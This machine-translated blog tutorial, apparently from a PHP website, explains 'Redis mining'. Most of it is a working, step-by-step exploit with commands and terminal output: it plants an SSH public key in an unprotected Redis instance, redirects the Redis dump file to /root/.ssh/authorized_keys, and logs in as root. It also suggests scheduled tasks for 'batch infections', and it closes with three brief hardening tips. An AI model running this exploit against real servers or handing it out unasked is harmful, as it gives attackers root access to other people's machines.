This article will talk about the principles of Redis mining, see how to prevent it, and share prevention techniques. I hope it will be helpful to everyone!
The author has also been attacked by a mining virus, which was very uncomfortable, but in fact, as long as you understand the means of intrusion, it is very easy to prevent it. Today we will demonstrate how to pass Redis performs privilege escalation to obtain the Root user of the remote server. [Related recommendations: Redis Video Tutorial]
1. First we need some prerequisites
Condition 1: You First, there must be a Redis, and we must know its port [default 6379];
Condition 2: The password of Redis cannot be too complex, or there is no password;
Condition 3: The user who starts Redis is preferably a Root user, which will be more destructive;
2. Start making trouble
Generate a pair through ssh-keygen. Of course, you can use the existing ones without any problem.
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Next, the attack key value is generated through the public key.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
The content is as follows
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
The purpose of adding two newlines before and after here is to prevent the data from being connected together and causing failure problems.
The operation is as follows:
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OK
Log in to Redis to check whether it has been written into Redis.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
Let’s see the following operations
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exit
At this time, we log in remotely Check the effect on the host.
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~# w
OK, we have successfully escalated our rights here, so let’s take a look at what the exported file is? In fact, it is just the saved file form of Redis. If you are interested, you can open it yourself and have a look. It will not be shown here.
3. How to prevent
This vulnerability is quite powerful. We only have one host permission now, add it to the scheduled task to execute some scripts, and then What about batch infections?
Tips for prevention are as follows:
Redis should not listen on dangerous IPs. If so, please add firewall control;
Redis must increase password restrictions, and it cannot be a weak password;
Try not to start Redis as the Root user.
Follow the above three points to prevent Redis mining, no problem
For more programming-related knowledge, please visit:Introduction to Programming! !
The above is the detailed content of A brief analysis of the principles of Redis mining and how to prevent it (skill sharing). For more information, please follow other related articles on the PHP Chinese website!